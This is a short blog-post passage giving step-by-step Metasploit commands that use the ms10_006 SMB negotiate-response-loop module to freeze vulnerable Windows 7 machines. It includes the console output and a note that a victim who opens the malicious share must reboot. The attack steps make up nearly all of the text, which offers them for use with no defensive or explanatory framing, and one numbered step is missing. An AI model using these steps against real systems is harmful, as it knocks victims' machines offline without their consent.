document otherwise.
![]() |
DOS ATTACK ON WINDOWS-7 USING METASPLOIT 2016 |
(1)msfconsole
(2)use dos/windows/smb/ms10_006_negotiate_response_loop
(3)show options
(5)exploit
[*] Starting the malicious SMB service...
[*] To trigger, the vulnerable client should try to access: \\I.P.\Shared\Anything
[*] Server started.
If the system that accessed that location is vulnerable, it will immediately freeze. To get out of that state, restart the system.
No comments:
Post a Comment